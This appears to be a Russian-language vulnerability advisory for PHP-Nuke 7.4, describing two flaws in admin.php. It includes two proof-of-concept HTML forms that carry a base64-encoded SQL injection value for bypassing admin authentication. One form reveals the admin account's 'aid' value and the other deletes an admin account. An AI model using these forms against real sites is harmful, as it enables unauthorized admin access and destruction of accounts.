Программа: PHP-Nuke 7.4 

Две уязвимости обнаружены в PHP-Nuke в обработке некоторых административных команд. Удаленный пользователь может просматривать информацию административной учетной записи и удалять административную учетную запись. 

Удаленный пользователь может представить специально обработанный POST запрос, чтобы просматривать ‘’aid’ значение административной учетной записи. Пример: 

<form name=»form1″ method=»POST» action="http://www.sitewithphpnuke.com/
admin.php">
<input type=»hidden» name=»admin» value=»eCcgVU5JT04gU0VMRUNUIDEvKjox»>
<br>
<input type=»hidden» name=»add_radminsuper» value=»1″>
<br>
<input type=»hidden» name=»op» value=»mod_authors»>
<input type=»submit» name=»Submit» value=»Display»>
<br>
</p>
</form>

Также удаленный пользователь может представить специально обработанный POST запрос, чтобы удалить административную учетную запись. Пример: 

<form name=»form1″ method=»POST» action="http://www.sitewithphpnuke.com/
admin.php">
USERNAME: <input type=»text» name=»del_aid»>

<input type=»hidden» name=»admin» value=»eCcgVU5JT04gU0VMRUNUIDEvKjox»>
<br>
<input type=»hidden» name=»add_radminsuper» value=»1″>
<br>
<input type=»hidden» name=»op» value=»deladminconf»>
<input type=»submit» name=»Submit» value=»Delete Admin»>
<br>
</p>
</form>



Оставить мнение